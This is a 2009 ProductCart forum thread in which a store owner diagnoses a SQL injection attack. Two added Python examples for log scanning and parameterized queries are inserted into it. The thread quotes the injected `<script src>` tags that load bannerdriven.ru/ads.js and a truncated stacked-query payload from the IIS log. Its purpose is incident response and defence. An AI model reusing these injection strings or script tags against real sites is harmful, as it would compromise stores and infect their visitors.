ProductCart Forum > Using ProductCart

SQL injection victim?

BrianRoden (Groupie, joined 07-September-2007)
Posted: 25-September-2009 at 12:23pm
This morning our ProductCart 3.51 store was taking forever to load. When the home page finally came up, all the buttons under the featured items were red X's with text, which threw our columns totally off.

I right-clicked on the box where the button should be and looked at properties. After the .gif in the image filename was some script pointing to bannerdriven.ru/ads.js. I started digging around. The layout and icons tables had been modified with this script at the end of each value. The pcStoreSettings had also been altered with these script tags inserted into various fields:

Store closed message: The store is temporarily closed so we can perform a software upgrade. Please try back after 10:00 a.m. CDT.<script src=http://www.bannerdriven.ru/ads.js></script><script src=http://www.bannerdriven.ru/ads.js></script>

SSL URL: https://www.ourregularurl.com<script src=http://www.bannerdriven.ru/ads.js></script><script src=http://www.bannerdriven.ru/ads.js></script>

Home page: <script src=http://www.bannerdriven.ru/ads.js></script><script src=http://www.bannerdriven.ru/ads.js></script>

More digging shows other tables have been affected, like Orders.

This looks like a SQL injection attack. We have the Windows firewall on the Win2008 web server where this site runs set to only allow direct SQL TCP/IP connections from the web server itself and our office's dedicated IP block (we use SQL replication for a couple of databases that drive other websites on this server).

I googled bannerdriven.ru and it looks like lots of sites have had their script injected into fields.
Hamish (Admin Group, United Kingdom, joined 12-October-2006)
Posted: 25-September-2009 at 12:43pm
Hi,

You will need to get the database restored from a backup and investigate the logs to see if you can determine the source of the breach. We are not aware of any exploitable vulnerabilities in ProductCart v3.51 code.

If you have made modifications please make sure the data is sanitized correctly, see
- http://wiki.earlyimpact.com/how_to/sanitize_strings

Also see
- http://wiki.earlyimpact.com/productcart/securityrec#stores_using_a_ms_sql_database

I would also recommend checking that no other files on the site have been modified.

Hamish


Edited by earlyimp - 25-September-2009 at 12:45pm
ProductCart (Admin Group, ProductCart Team, joined 01-October-2003)
Posted: 25-September-2009 at 12:43pm
Brian,

we don't have any reports of any vulnerabilities in ProductCart v3.51. In our experience, the number one source of security holes is custom code:

- have you modified any of the source code?
- are you running any add-ons not provided by Early Impact?

Since some of the information might be confidential, we recommend that you open a support ticket.
The ProductCart Team

Home of ProductCart shopping cart software
ProductCart (Admin Group, ProductCart Team, joined 01-October-2003)
Posted: 25-September-2009 at 12:46pm
Two of us posted at the same time :-)

The idea is the same, as you can see. You need to review any modifications ever made to your ProductCart source code to ensure that they did not introduce a security issue.
The ProductCart Team

BrianRoden (Groupie, joined 07-September-2007)
Posted: 25-September-2009 at 1:21pm
Using GreyBeard's session saver add-in.

We've made minor mods to source code on some of our PC sites (we have 3). Rearranging layouts, changing the Continue Shopping button on the shopping cart page to go back to the category the user just bought from, instead of back to the home page.

We added an RSS feed as an ASPX app in a subfolder to display the newest products per category for people who want to subscribe to get updates on their craft of interest. It accesses the same DB and works off a URL that has a category ID passed in the query string. Wonder if someone used the RSS URL.

I'll check the IIS logs.
ProductCart (Admin Group, ProductCart Team, joined 01-October-2003)
Posted: 25-September-2009 at 1:29pm
Yes, the query string that carries the category ID would be the first thing to review. Incorrectly sanitizing a query string is normally the number one culprit for SQL injection.
The ProductCart Team

BrianRoden (Groupie, joined 07-September-2007)
Posted: 25-September-2009 at 1:43pm
The RSS feed is its own app in IIS, with its own separate log files, new file each day. The last log file was from 9/18/09. Doesn't look like this was the vector, or we would have had an entry for yesterday. We know yesterday is when the problem started, because Thursday night's DB backup was clean and we were able to restore it to get the DB back to normal.

Searching the IIS log for the PC site, the first occurrence of bannerdriven.ru shows up at 4:40 p.m. yesterday. I'm going to keep digging.

BrianRoden (Groupie, joined 07-September-2007)
Posted: 25-September-2009 at 3:15pm
Found this page

then searched yesterday's IIS log for this site for the string SET%20 and found this

2009-09-24 16:40:03 W3SVC6487 servername se.rv.er.ip GET /cart/pc/viewCategories.asp idCategory=2;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434C4152452040542056

(I've omitted the full string for security purposes.)

I'll open a support ticket with the complete string.

Edited by BrianRoden - 25-September-2009 at 3:17pm
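The log search described in this post can be automated. The following Python script is an added example, not code from the thread or from ProductCart: it parses IIS W3C extended log entries, URL-decodes the query string (so `SET%20` becomes `SET `), flags any parameter that carries a second T-SQL statement after a semicolon, and decodes the hex literal handed to CAST() so the start of the smuggled statement is readable. The log lines in SAMPLE_LOG are constructed, modelled on the quoted entry, and keep only the hex prefix the post shows; the field list and server IP are assumptions.

```python
"""Scan an IIS W3C log for stacked-query SQL injection attempts like the
viewCategories.asp request quoted in the thread. Added example; it is
not ProductCart code. SAMPLE_LOG is constructed, modelled on the quoted
line, and keeps only the hex prefix the thread shows."""
import re
from urllib.parse import unquote

SAMPLE_LOG = """#Software: Microsoft Internet Information Services 7.0
#Fields: date time s-sitename s-computername s-ip cs-method cs-uri-stem cs-uri-query
2009-09-24 16:38:11 W3SVC6487 servername 10.0.0.5 GET /cart/pc/viewCategories.asp idCategory=2
2009-09-24 16:40:03 W3SVC6487 servername 10.0.0.5 GET /cart/pc/viewCategories.asp idCategory=2;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434C4152452040542056
2009-09-24 16:41:30 W3SVC6487 servername 10.0.0.5 GET /cart/pc/viewProduct.asp idProduct=17
2009-09-24 16:42:05 W3SVC6487 servername 10.0.0.5 GET /cart/pc/home.asp -
"""

# A ';' followed by a T-SQL statement keyword means a second statement was
# appended to the parameter: the signature of a stacked query.
STACKED_SQL = re.compile(
    r";\s*(declare|set|exec|execute|cast|update|insert|delete|drop)\b", re.I)
# Payloads are commonly smuggled as a hex literal handed to CAST(); decoding
# it shows what the statement would have been.
HEX_LITERAL = re.compile(r"0x([0-9a-fA-F]+)")


def parse_w3c(text):
    """Yield one dict per entry, keyed by the names in the latest #Fields line."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.startswith("#") or not line.strip():
            continue
        else:
            yield dict(zip(fields, line.split()))


def decode_hex_literals(query):
    """Return the text behind every 0x... literal (truncated literals allowed)."""
    decoded = []
    for match in HEX_LITERAL.finditer(query):
        digits = match.group(1)
        if len(digits) % 2:          # a cut-off log line may leave half a byte
            digits = digits[:-1]
        decoded.append(bytes.fromhex(digits).decode("latin-1"))
    return decoded


def find_injection_attempts(text):
    """Return the entries whose query string carries a stacked T-SQL statement."""
    hits = []
    for entry in parse_w3c(text):
        raw = entry.get("cs-uri-query", "-")
        if raw == "-":
            continue
        query = unquote(raw)          # IIS logs the URL-encoded form (SET%20 ...)
        match = STACKED_SQL.search(query)
        if match:
            hits.append({
                "time": f"{entry['date']} {entry['time']}",
                "uri": entry["cs-uri-stem"],
                "keyword": match.group(1).upper(),
                "decoded_hex": decode_hex_literals(query),
            })
    return hits


if __name__ == "__main__":
    for hit in find_injection_attempts(SAMPLE_LOG):
        print(hit["time"], hit["uri"], hit["keyword"], hit["decoded_hex"])
```

Run against a real log, the scanner reports the 16:40:03 entry with keyword DECLARE and decodes the page's hex prefix to `DECLARE @T V`, the opening of the statement that the rest of the literal would have carried. Searching on the decoded form catches variants that use `%3B` or other encodings for the semicolon, which a plain text search for `SET%20` would miss.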
BrianRoden (Groupie, joined 07-September-2007)
Posted: 25-September-2009 at 4:00pm
Found the problem. We had added some code in the footer.asp to check the current category and work back up the tree to the top-level category, then insert banner ad code from an Excel file based on the top-level category. I failed to check the idCategory with validNum, which allowed the stuff after the semicolon to get through.

I do most of my development in ASP.NET, using object data sources and parameterized queries with stored procedures that check stuff on the back end. I'm not used to doing it the classic ASP way.
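The two defences this post names, a strict number check on idCategory before it is used and parameterized queries for the walk up the category tree, can be shown together. The following is an added example written in Python rather than the site's classic ASP, and is not ProductCart's or the poster's code: valid_num plays the role of the missing validNum call, query_param splits the query string on `&` only so a `;` stays inside the value exactly as the page would receive it, and top_level_category binds every id as a parameter instead of concatenating it into SQL text. The categories table, its parentCategory column and the rows in it are constructed for the demonstration.

```python
"""The two checks that would have stopped the request in the thread:
a strict integer test on idCategory (the validNum call the footer code
lacked) and a bound-parameter query for the walk up the category tree.
Added example in Python rather than classic ASP; not ProductCart code.
The categories table and its parentCategory column are constructed."""
import sqlite3
from urllib.parse import unquote_plus


class BadParameter(ValueError):
    """Raised for any idCategory that is not a plain unsigned integer."""


def valid_num(raw, max_digits=10):
    """Accept ASCII digits only; anything else (';', quotes, spaces) is
    rejected before it gets anywhere near SQL text."""
    value = (raw or "").strip()
    if (not value or len(value) > max_digits
            or not value.isascii() or not value.isdigit()):
        raise BadParameter(f"idCategory is not a number: {raw!r}")
    return int(value)


def query_param(query_string, name):
    """Split on '&' only, so a ';' stays inside the value the way
    Request.QueryString hands it to the page."""
    found = [unquote_plus(part.partition("=")[2])
             for part in query_string.split("&")
             if part.partition("=")[0] == name]
    if len(found) != 1:
        raise BadParameter(f"{name} missing or repeated")
    return found[0]


def category_id_from_query(query_string):
    """Validated idCategory from a raw query string, or BadParameter."""
    return valid_num(query_param(query_string, "idCategory"))


def build_demo_db():
    """Constructed category tree: 1 and 3 are roots, 2 sits under 1, 5 under 2."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE categories (idCategory INTEGER PRIMARY KEY, "
                 "parentCategory INTEGER, name TEXT)")
    conn.executemany("INSERT INTO categories VALUES (?, ?, ?)", [
        (1, 0, "Knitting"), (2, 1, "Needles"), (5, 2, "Circular needles"),
        (3, 0, "Quilting")])
    return conn


def top_level_category(conn, raw_id):
    """Walk from the requested category up to its root, as the custom
    footer did, with every id bound as a parameter, never concatenated."""
    cat_id = valid_num(raw_id)
    seen = set()
    while True:
        row = conn.execute(
            "SELECT idCategory, parentCategory FROM categories WHERE idCategory = ?",
            (cat_id,)).fetchone()
        if row is None:
            raise BadParameter(f"unknown category {cat_id}")
        if not row[1]:                  # parent 0 / NULL marks a top-level category
            return row[0]
        if cat_id in seen:
            raise BadParameter(f"cycle in category tree at {cat_id}")
        seen.add(cat_id)
        cat_id = row[1]


def lookup_bound_only(conn, raw_id):
    """Second line of defence: even without valid_num, a bound parameter is
    compared as data, so an injected string matches nothing and runs nothing."""
    return conn.execute(
        "SELECT idCategory, parentCategory FROM categories WHERE idCategory = ?",
        (raw_id,)).fetchone()


def rejects(query_string):
    """True if the request would be refused before any query runs."""
    try:
        category_id_from_query(query_string)
    except BadParameter:
        return True
    return False


if __name__ == "__main__":
    db = build_demo_db()
    print(top_level_category(db, "5"))                            # 1
    print(rejects("idCategory=2;DECLARE%20@S%20VARCHAR(4000)"))   # True
```

The order matters: the number check runs first and refuses the whole request, so the page never reaches the database with a bad value, and the bound parameter is there for the case where a value reaches a query by some other path. Concatenating the id into SQL text, which is what the footer code did without validNum, has neither protection.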
ProductCart (Admin Group, ProductCart Team, joined 01-October-2003)
Posted: 25-September-2009 at 5:04pm
Hi Brian,

Thanks for updating the post with this information. It's a good reminder for everyone to make sure all database input is sanitized per the instructions on the following page from our WIKI:

http://wiki.earlyimpact.com/how_to/sanitize_strings

Sincerely,

Early Impact
The ProductCart Team